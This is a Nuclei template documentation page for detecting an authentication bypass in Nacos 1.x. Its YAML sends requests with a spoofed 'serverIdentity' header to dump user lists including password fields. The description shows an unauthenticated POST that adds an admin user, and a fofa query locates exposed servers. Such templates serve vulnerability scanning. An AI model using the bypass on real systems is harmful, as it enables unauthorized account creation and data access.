Skip to content
Nuclei Templates

Nacos 1.x - Authentication Bypass

ID: nacos-auth-bypass

Severity: critical

Author: taielab,pikpikcu,SleepingBag945

Tags: nacos,auth-bypass

Description

Section titled “Description”

Nacos 1.x was discovered. A default Nacos instance needs to modify the application.properties configuration file or add the JVM startup variable Dnacos.core.auth.enabled=true to enable the authentication function (reference: https://nacos.io/en-us/docs/auth.html). But authentication can still be bypassed under certain circumstances and any interface can be called as in the following example that can add a new user (POST https://127.0.0.1:8848/nacos/v1/auth/users?username=test&password=test). That user can then log in to the console to access, modify, and add data.

YAML Source

Section titled “YAML Source”
id: nacos-auth-bypass


info:
  name: Nacos 1.x - Authentication Bypass
  author: taielab,pikpikcu,SleepingBag945
  severity: critical
  description: |
    Nacos 1.x was discovered. A default Nacos instance needs to modify the application.properties configuration file or add the JVM startup variable Dnacos.core.auth.enabled=true to enable the authentication function (reference: https://nacos.io/en-us/docs/auth.html). But authentication can still be bypassed under certain circumstances and any interface can be called as in the following example that can add a new user (POST https://127.0.0.1:8848/nacos/v1/auth/users?username=test&password=test). That user can then log in to the console to access, modify, and add data.
  reference:
    - https://github.com/alibaba/nacos/issues/4593
    - https://nacos.io/en-us/docs/auth.html
    - https://zhuanlan.zhihu.com/p/602021283
  classification:
    cpe: cpe:2.3:a:alibaba:nacos:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: alibaba
    product: nacos
    fofa-query: app="NACOS"
  tags: nacos,auth-bypass


http:
  - method: GET
    path:
      - "{{BaseURL}}/nacos/v1/auth/users?pageNo=1&pageSize=9"
      - "{{BaseURL}}/v1/auth/users?pageNo=1&pageSize=9"


    headers:
      serverIdentity: security
    stop-at-first-match: true


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"totalCount":'
          - '"username":'
          - '"password":'
          - '"pagesAvailable":'
        condition: and


      - type: word
        part: header
        words:
          - application/json


      - type: status
        status:
          - 200
# digest: 4a0a00473045022100aa8d5a9bf6c2f0eb891df6cd997858b4f79c2a61dcc8714fa5b2177ac25b1aff02205c9c8d7068d45a3b7c3c65e8aa99349ac1d4c816af54fe7501fd57b0bb184d2e:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/vulnerabilities/other/nacos-auth-bypass.yaml"

View on Github